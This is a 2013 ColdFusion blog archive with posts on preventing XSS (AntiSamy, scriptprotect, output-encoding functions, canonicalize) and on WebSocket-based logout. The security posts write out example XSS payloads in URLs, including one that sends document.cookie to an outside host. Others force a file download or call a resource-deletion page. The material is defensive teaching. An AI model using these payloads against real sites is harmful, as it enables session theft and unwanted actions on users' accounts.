Saturday, December 21, 2013

ColdFusion AntiSamy library integration for XSS attack protection

I have already described what is XSS attack and few examples of XSS attack and how we can protect our application from those attacks in below posts:
Now, let's see what are the other advance types of XSS attack can affect our application and how we will prevent those attack.

In general prevention method we are preventing rendering of any HTML code inputted by a user but if our application really wants user to input HTML text then how we will prevent it?
Example:  In many applications we include Rich Text Editor(RTE) in our application and the final output of this RTE is nothing but html code and user who is having some wrong intention can easily attack your application.

We called this attack as "AntiSamy" attack, because Samy is the person who first discovered this attack. For more details about AntiSamy attack please go through this: OWASP AntiSamy Project

To prevent this attack OSWAP has released one library which will take your user input and clean the input to make it XSS safe string. This library is available in .NET and also in JAVA.

Let's implement the JAVA library in ColdFusion to prevent the attack.
You can download the full ColdFusion code with example in zip format from this link: Download ColdFusion Code.

This zip file contains following files:
- Application.cfc
- Application_CFC_for_CF9( Use this file as Application.cfc in case you are using ColdFusion 9 or lower version. Here we are using javaloader to load library which is not needed in CF10)
- index.cfm
- lib - This directory contains
     antisamy-1.5.3.jar                 - AntiSamy java library
     antisamy-slashdot-1.4.4.xml - AntiSamy filter settings file
- javaloader - This library used for loading java library for CF9 or lower version.

Let's review the code now:

In Application.cfc we are just loading java library using CF10 library loading method and creating an AntiSamy object on application start, so that we can use it through out the application by using that object.

Let's see index.cfm as below:

In index.cfm we are scanning the input  by using the library and getting clean HTML and also error by anti samy scanning. See the output below:
So, here we are getting clean html along with error messages by AntiSamy scanning. You can also define your own AntiSamy rules by modifying  antisamy-slashdot-1.4.4.xml.  For reference you can see other web site setting files available in AntiSamy library home here.

Hope now you can integrate this library in your application!!!

Download AntiSamy from its home on Google Code


Examples Of XSS Attack

Let's start with some examples of XSS attack.
Here we have three files as listed below and put the three files in same folder and run "index.cfm" page:
  • Application.cfc
  • index.cfm -
  • comment.json - Stores the comment added in the post
Application.cfc:

Find index.cfm below:

and next comment.json where I have added a comment as "First comment" as below, this file is used as our comment storage.

First if you run index.cfm then you will see the output as follows:

As we can see here we have only one comment which was present initially in the JSON file. Let's add some comment for our testing.
Test 1:
Input: <script>alert('Hello Girls!')</script> and see the output below.

If you notice in dump section we are getting the text as "<InvalidTag>alert('Hello Girls!')</script>" and in comment output we are getting "alert('Hello Girls!')".
This is because, in Application.cfc we have added this.scriptprotect = "all"; which is converting the script to "InvalidTag" and helps from such basic XSS attack.

For your testing make this.scriptprotect = "none"; and enter the same comment again and see the output. This time you will see the alert message instead of any <InvalidTag> as the comment.

Test 2:
Input: <body onload="alert('Hi');">XSS Body</body> and in output first you will get an alert message which will display "Hi" and after clicking OK, in comment section you will find your text "XSS Body".
Every time you load the page you will see the same result. So, how to protect here to your site???
Ans: Use appropriate display formatting function while displaying the comment as below:

For CF9:
<cfloop array="#commentObj['blogcomment']#" index="comment">
<li>#HtmlEditFormat(comment)#</li>
</cfloop>
For CF10:
<cfloop array="#commentObj['blogcomment']#" index="comment">
<li>#EncodeForHTML(comment)#</li>
</cfloop>

In both the cases we will never get any alert message and output comment would be:
"<body onload="alert('Hi');">XSS Body</body>"

If you want to avoid storing this malicious HTML in your storage then before string the comment just use the display formatting function:
<cfset arrayAppend(commentObj['blogcomment'], HtmlEditFormat(form.blogCommentText))>
Or
<cfset arrayAppend(commentObj['blogcomment'], EncodeForHTML(form.blogCommentText))>

After using this function before storing into database, don't need to use any display formatting function while displaying the comment anymore as it is already converted into XSS safe string.


The entered text could be in encoded format visit the URL for detail encoded malicious script : https://www.owasp.org/index.php/Double_Encoding

In that case use the function "sanitizeScope" which is described in http://coldfusion-tip.blogspot.in/2013/12/coldfusion-application-security.html would come handy. Inside "onRequestStart" you can call: sanitizeScope( form ) or you can call that function in any particular page wherever you want to use.

Hope you enjoyed the examples!!!

NOTE: All the examples tested in FireFox 26.0  and it may vary in different browsers and  in different ColdFusion version as browsers are also taking XSS attack measure and in CF versions also Adobe making CF more in each release.

Wednesday, December 18, 2013

ColdFusion Application Security

Web Security one most favorite topic of mine. Though I’m not an expert in Web Security, I thought to share my idea which I learned, so that it will help someone who starts with this topic.

NOTE: You can take this article as a beginner guide to Web Security and carry on your journey to explore more on this field.

Following are the most common security vulnerability we generally face for our web application.
  • XSS Attack.
  • SQL Injection.
  • CSRF Attack.
  • File Uploading.
  • Session Hijacking.
  • Password Protection.

Out of the above listed security vulnerability; XSS attack has a huge share of 84%. So, let’s start with XSS attack.

XSS (Cross Site Scripting) Attack
In this type of attack the attacker inject some client side script into Web pages of the application. Sometimes the malicious script stored permanently in database or in some storage and sometimes it passed in form submit or in url query string to deface the website.

This XSS Attack is divided into two types:
  • Non - Persistent XSS Attack.
  • Persistent XSS Attack.

Non - Persistent XSS Attack:
In this type of attack the script is not going to be stored somewhere but the attacker passes the malicious script by URL or FROM submits to deface the website.
Question arises, attacker may see some error message if he/she will pass that script how it's going to affect real user or the application?
Suppose attacker able to pass the wrong URL to provide the wrong URL to user in email or by any other medium and a user clicks on that wrong url then the user may face following problem.

Let say we have a page called index.cfm and have following code:
<cfoutput>#url.name#</cfoutput>. Means it only displays the "name" parameter value which we pass in url scope.

All the below examples are tested in Firefox 26.0 browser.

Attacker can get the session cookie of user and can take access of his login.
Example:  http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://www.google.com?cookie=' %2B document.cookie"></body>

Attacker can able to download some executable file into the user’s computer.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="document.location='https://docs.google.com/uc?export=download%26id=0B2GDR5_Jv000OW9pSEZhaGZhQ1k'"></body>
Here I am downloading one of my zip file so don't worry for now :)

Attacker can delete any resource from that user account.
Example: http://localhost:8500/xsstesting/index.cfm?name=<body onload="alert('Hi');document.location='http://localhost:8500/xsstesting/deleteResource.cfm'"></body>

Suppose there is a page called "deleteResource.cfm" which will delete a particular resource then attacker can delete that resource.
Similarly we can create similar kind of attack while submitting a form.

Let’s see how we can protect our self from such kind of attack.
1. Use the following setting in Application.cfc
      this.scriptprotect = "all";
This will save us from basic XSS attack like. If someone wants to directly execute a script tag like: http://localhost:8500/xsstesting/index.cfm?name=<script type="text/javascript">alert('Hello');</script>  then you will see in output as:

<InvalidTag type="text/javascript">alert('Hello');</script>

So, the script will never execute in browser but it cannot protect script like we passed in body tag or any anchor tag. When we enables script protect in Application.cfc then ColdFusion parses variables of a particular scope and if it finds any which may cause XSS threat it replaces that tag by “Invalid”. What are the script tags are protected by ColdFusion server you can find from:
\{CF-Directory}\cfusion\lib\neo-security.xml and search for CrossSiteScriptPatterns. If you want to add any additional tags there for protecting then you can also add there and you have to restart CF server after making the changes.

2. Use some secure data formatting function while displaying the data to user like below.
<cfoutput>#htmlEditFormat(url.name)#</cfoutput> 

What are the other secure data formatting functions available?

Version
Context Of Use
Function
Example
CF 9
HTML  Body
HTMLEditFormat
<cfoutput>#HTMLEditFormat(url.name)#</cfoutput>
CF9
URL String
URLEncodedFormat
<a href="./dispUserList?name=#URLEncodedFormat(url.name)#">User List</a>
CF10
HTML Body
EncodeForHTML
<cfoutput>#EncodeForHTML(url.name)#</cfoutput>
CF10
HTML Attribute
EncodeForHTMLAttribute
<div class="#EncodeForHTMLAttribute(url.name)#">...</div>
CF10
JavaScript
EncodeForJavascript
<script>var name = "#EncodeForJavascript(url.name)#";</script>
CF10
CSS
EncodeForCSS
<style>body{background-color:#encodeForCSS(url.color)#;}</style>
CF10
URL
EncodeForURL
<a href="./dispUserList?name=#EncodeForURL(url.name)#">User List</a>

We have already applied some security measure. So, you think you are safe now. N0!!!

Why? Here in the above example in most of the cases we have passed the script as plain text, so the different secure displaying functions are able to convert that string into a display safe string and displaying it. If someone passes the string in different encoding format available which supports by most of the browsers.

Example:  
There are many ways where we can represent our string if we are using UTF-8 encoding in our web page.
Let say in how many ways I can represent a string : "<script>"
<script> : &lt;script&gt;
<script>:  %26lt;script%26gt;
Similarly we can replace all "script" by hex code and also we can use other encoding to form the string. So, our display formatting function will not be able to detect all these.

Question comes, what we will do now?
First decode the variable which we are getting by some user input and decode that to plain text format. Then pass that to display formatting function. See the below example.
I have added new function called "sanitizeScope" in Application.cfc. It will decode all variables in a particular scope if you pass that scope as a argument to that function. So, in onRequestStart() method I’m calling that function to decode all variables in URL scope and I can use the display formatting function safely in my browser.
In the above example I have used a new function "canonicalize", which is added in ColdFusion 10 and is used for decoding a string.
Till now we have covered basic non-persistent scope XSS attack and how to avoid it. Hope you have enjoyed it!!! 


Persistent XSS Attack
In previous section we just learned, what is non – persistent XSS attack and how we can restrict it. Now, let’s starts with Persistent XSS Attack. This type of attack is most dangerous for a application as it will affect the application until and unless the malicious script is removed.

Persistent XSS Attack means the malicious script permanently stored in our application. Let say in one blog post some attacker has added malicious script in comment; when the blog post will be loaded then it will load that script and attacker can able to perform whatever he wants to do with your application.


Find the example here: http://coldfusion-tip.blogspot.in/2013/12/examples-of-xss-attack.html

How we can prevent such attack?

Use the method “sanitizeScope” which I just described in previous section ( or you can directly use “canonicalize”  for deciding any inputs entered by user) then apply display formatting methods available in different versions of ColdFusion while displaying user inputs or while storing user inputs in database.

You can apply this process before saving the data into database, so that each time you don’t have to use display formatting function while displaying the data. But, sometimes developers prefer not to change any user input while saving in database but to format the data while displaying to user. It depends on personal preference.

We have covered all basic XSS attack prevention methods available in ColdFusion. In next of XSS attack we will see some advance concept. 

Thursday, December 12, 2013

Display login screen in browser when session time out for a user using Web Socket

If you will notice the ColdFusion Administrator of CF10 then you can find that in some intervals of time it keeps refreshing. Though I am not sure why it is refreshing but I believe that refresh option is added just to take user to login screen when session time out occurs.

Let say you are using some chatting application and you have opened different chat window in different tabs and you logout from the application and you forgot to close other chat window tabs. The other chat tab which is opened may have some sensitive/private information which others can view. So, ideally we should view the login screen in all tabs once a user manually logs out or when the session timeout occurs.

We can show user login screen in all tabs when session timeout occurs/logs out by the user by using one of the following ways.
  1. Keeps refreshing our page in some intervals of time and when session times out then you will automatically redirect to login screen. But this may create issues like content reload unnecessarily. 
  2. Keep making AJAX call to server to verify login status in some intervals of time and reload the page whenever required. This is correct upto some extent okay but we have to make AJAX call in some intervals of time, i,e - some extra burden.
  3. Use Web Socket to achieve the functionality without refreshing the screen in some intervals of time.
For #1 and #2 time interval will be more than the session timeout time. 

I think #1 and #2 is not the optimized way of do that. So, lets see how we can achieve that using ColdFusion Web Socket  and I think this is one of the best method to achieve this.

Before I move ahead please download the application here.(Login Tracking By WebSocket.)

***NOTE: Attached code will work only in ColdFusion 10

Create a Web application in your computer using the above code and use any email ID and Nick name to login into the Application.

Code Description:
Code contains inline comments and I am describing the whole logic below.

How Does the Code Works:

We have defined a channel "Logout" in Application.cfc. Using this channel we can create no of sub channel of it in our application.

Logout.onLineUser - This channel no of currently online users in this application.
Logout.{email ID Login User} - This channel identifies whether a user is log in or log out from the system.


Step 1: (Login Page and Login Process)

- Display Login Screen to user if the user is not log in into the system.
- Take email ID and nick name to allow user to log in into the system and save the email ID in Application scope,
  a) so that other user can able to see online users of the Application at any time
  b) Make email validation, i.e :- Multiple login of same email ID is blocked at a time.
- Publish the online users into "Logout.onLineUser" channel.
- Redirect to index.cfm page.

Step 2:(index.cfm page and Display Online User)

- Load all online users from "Application.userInfo" variable.
- Initiate two channels: 1. Logout.onLineUser 2. Logout.{email ID} (Here we are removing "." and "@" from the email ID while creating sub channel)
- onLineResponseHandler : - In online user handler we will write the logic, if we are receiving data from user then display all the online user information received in UI.
- logoutResponseHandler: - In this response handler we will receive data if the user logout from the system. So, reload the page. As the session is undefined it will take you to the login screen.

Step 3:( Log out Functionality)

- In index.cfm we have added a logout link. If you click on that link then it will take you to logout.cfm and then it calls logoutUser method present in Utility.cfc.
- logoutUser() we are taking two parameter.
 1. Application scope.
 2. Login Info Structure from Session scope.

- We are deleting the user information from "Application.userInfo".
- We are clrearing the Session Scope and publishing login status of the user to
- Publish all available user information to "Logout.onLineUser" channel. So that all active users can see the online status at that instant.
- Publish login status of the currently logout user to  channel "Logout.{email ID}"  and in JS code after getting the status the page will be reloaded, as the session is already cleared then it will redirect to login page.

Step 4: Auto Log out by Session timeout

- When session time out wil happen then we are calling "logoutUser()" from onSessionEnd().
- In logoutUser() method we are just deleting the user information from Application.userInfo and publishing the logut status to reload the browser if that is opened.

Hope you have enjoyed!!!

Followers